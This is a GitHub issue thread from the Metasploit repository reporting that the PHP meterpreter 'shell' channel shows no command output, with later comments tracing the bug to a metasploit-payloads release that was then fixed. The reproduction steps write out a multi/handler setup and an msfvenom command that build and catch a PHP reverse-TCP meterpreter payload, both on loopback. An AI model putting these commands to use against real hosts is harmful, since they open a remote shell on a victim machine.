### ISSUE TITLE
PHP meterpreter 'shell' channel doesn't show command output

### ISSUE THREAD

**Issue by justinsteven** [rapid7/metasploit-framework#14251]
tl;dr PHP meterpreter connects. I can do `shell`. Commands that I enter do actually run on the victim host, but there's no output in my `msfconsole`.

```
[justin@2a33356e3953 D /opt/metasploit-framework](r7_master/?1)% bundle | grep metasploit
Using metasploit-concern 3.0.0
Using metasploit-model 3.1.2
Using metasploit_data_models 4.1.0
Using metasploit-credential 4.0.2
Using metasploit-payloads 2.0.16
Using metasploit_payloads-mettle 1.0.2
Using metasploit-framework 6.0.11 from source at `.`

[justin@2a33356e3953 D /opt/metasploit-framework](r7_master/?1)% git log -n1
commit 05c389a6d5238aedbc4b98614261da545a2432ed (HEAD -> r7_master, origin/master, origin/HEAD)
Author: Metasploit <metasploit@rapid7.com>
Date:   Thu Oct 8 17:36:23 2020 -0500

    automatic module_metadata_base.json update

```

## Steps to reproduce

Start a multi/handler at 127.0.0.1:4444 (We'll run the staged payload on the attacker host, for simplicity)

```
[justin@2a33356e3953 D /opt/metasploit-framework](r7_master/?1)% cat php_handler.rc
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
set ExitOnSession false
exploit -j

[justin@2a33356e3953 D /opt/metasploit-framework](r7_master/?1)% ./msfconsole -r php_handler.rc -q
[*] Processing php_handler.rc for ERB directives.
resource (php_handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (php_handler.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (php_handler.rc)> set LHOST 127.0.0.1
LHOST => 127.0.0.1
resource (php_handler.rc)> set LPORT 4444
LPORT => 4444
resource (php_handler.rc)> set ExitOnSession false
ExitOnSession => false
resource (php_handler.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444

```

Produce and execute a staged payload

```
[justin@2a33356e3953 D /tmp/tmp.TtaxVwGsEx]% /opt/metasploit-framework/msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1110 bytes
Saved as: payload.php

[justin@2a33356e3953 D /tmp/tmp.TtaxVwGsEx]% php -v
PHP 7.3.19-1~deb10u1 (cli) (built: Jul  5 2020 06:46:45) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.19, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.19-1~deb10u1, Copyright (c) 1999-2018, by Zend Technologies

[justin@2a33356e3953 D /tmp/tmp.TtaxVwGsEx]% php payload.php 
/*

```

Meterpretersession1opened.gif

```
msf6 exploit(multi/handler) > [*] Sending stage (39264 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50812) at 2020-10-10 20:26:57 +1100

msf6 exploit(multi/handler) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > 

```

getuid works

```
meterpreter > getuid
Server username: justin (31337)
```

Drop to a shell. Run commands. Get no output.

```
meterpreter > shell
Process 55970 created.
Channel 0 created.
id 
whoami
ifconfig
echo foo
echo foo >&1
echo foo >&2
```

Leaving the shell for a moment, take note that `/tmp/hello` doesn't exist on the host

```
[justin@2a33356e3953 D ~]% cat /tmp/hello
cat: /tmp/hello: No such file or directory
```

Going back to our wonky `shell` channel, tell it to put something in `/tmp/hello`

```
echo "This command does actually run as $(id) on $(uname)" >> /tmp/hello
```

Leaving the shell once more, note that the file did get created :exploding_head: 

```
[justin@2a33356e3953 D ~]% cat /tmp/hello
This command does actually run as uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo) on Linux
```

## Expected behavior

`shell` should show command output

## Current behavior

`shell` doesn't show command output

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=php/meterpreter/reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=false
ListenerTimeout=0
LHOST=127.0.0.1
LPORT=4444
```

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
1      sessions -i -1
2      shell
3      exit
4      debug
```

</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[10/10/2020 20:36:38] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:07] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:07] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:36] [e(0)] core: Failed to connect to the database: No database YAML file
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
```

</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
[10/10/2020 20:36:36] [e(0)] core: Failed to connect to the database: No database YAML file
[10/10/2020 20:36:36] [d(0)] core: Created user based module store
[10/10/2020 20:36:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:36:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:36:38] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[10/10/2020 20:36:38] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[10/10/2020 20:36:39] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[10/10/2020 20:36:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[10/10/2020 20:36:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[10/10/2020 20:36:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[10/10/2020 20:36:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: none to reverse
[10/10/2020 20:36:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[10/10/2020 20:36:39] [d(1)] core: Module php/meterpreter/reverse_tcp is compatible with multi/handler
[10/10/2020 20:38:07] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:07] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:36] [e(0)] core: Failed to connect to the database: No database YAML file
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:38] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[10/10/2020 20:38:38] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[10/10/2020 20:38:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[10/10/2020 20:38:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[10/10/2020 20:38:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[10/10/2020 20:38:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: none to reverse
[10/10/2020 20:38:39] [d(3)] core: Checking compat [php/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[10/10/2020 20:38:39] [d(1)] core: Module php/meterpreter/reverse_tcp is compatible with multi/handler
[10/10/2020 20:41:25] [d(0)] core: monitor_rsock: EOF in rsock
```

</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 6.0.11-dev-05c389a6d5
Ruby: ruby 2.6.6p146 (2020-03-31 revision 67876) [x86_64-linux]
Install Root: /opt/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Git Clone
```

</details>

**Comment by justinsteven** [comment]
My git bisect shows that 8b76be283fcf16e0c7c395213ce5cfeca5eb1d17 is a good commit, then there's a bunch of wonky commits while @OJ is working on the TLV change and `metasploit-payloads` is mismatched, then 6f7861f17ec59e4c2e2f0698f706ed74a9464cbf which bumps `metasploit-framework` is the first bad commit.

**Comment by justinsteven** [comment]
Bug in metasploit-payloads. PR incoming over yonder

**Comment by justinsteven** [comment]
This has been fixed in `metasploit-payloads`. Fixing it in msf should just require a bump of `metasploit-payloads` to 2.0.20 (or one of 2.0.21 through 2.0.23 with @smcintyre-r7's work)

**Comment by smcintyre-r7** [comment]
That's right, and there's an outstanding PR for this, see: https://github.com/rapid7/metasploit-framework/pull/14267. Once that's landed we can get this closed out. Thanks Justin!

**Comment by justinsteven** [comment]
Fixed by the landing of https://github.com/rapid7/metasploit-framework/pull/14267
